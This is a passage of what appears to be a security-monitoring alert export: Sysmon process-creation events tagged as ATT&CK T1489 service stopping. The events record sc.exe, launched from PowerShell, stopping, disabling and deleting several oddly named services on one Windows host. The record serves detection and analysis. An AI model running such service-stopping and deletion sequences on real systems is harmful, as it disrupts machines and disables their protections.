Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.143"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001057272e00}"",""processId"":""2496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Natimmonal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.359",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.109 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010ad252e00} +ProcessId: 3664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.111465200Z"",""eventRecordID"":""3389"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.109\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010ad252e00}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:59.109"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010ad252e00}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.316",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.068 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001017232e00} +ProcessId: 380 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.070372300Z"",""eventRecordID"":""3386"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.068\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001017232e00}\r\nProcessId: 380\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.068"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001017232e00}"",""processId"":""380"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.984",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.041 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001055212e00} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Sougoudl 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.043982400Z"",""eventRecordID"":""3384"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.041\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001055212e00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.041"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001055212e00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.968",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.031 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108d202e00} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.033692300Z"",""eventRecordID"":""3383"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.031\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108d202e00}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.031"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00108d202e00}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.921",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:51:58.990 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010331d2e00} +ProcessId: 7800 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.992205100Z"",""eventRecordID"":""3380"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.990\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010331d2e00}\r\nProcessId: 7800\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.990"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010331d2e00}"",""processId"":""7800"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.878",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.940 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001073192e00} +ProcessId: 7516 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.942054700Z"",""eventRecordID"":""3377"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.940\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001073192e00}\r\nProcessId: 7516\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager 
Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 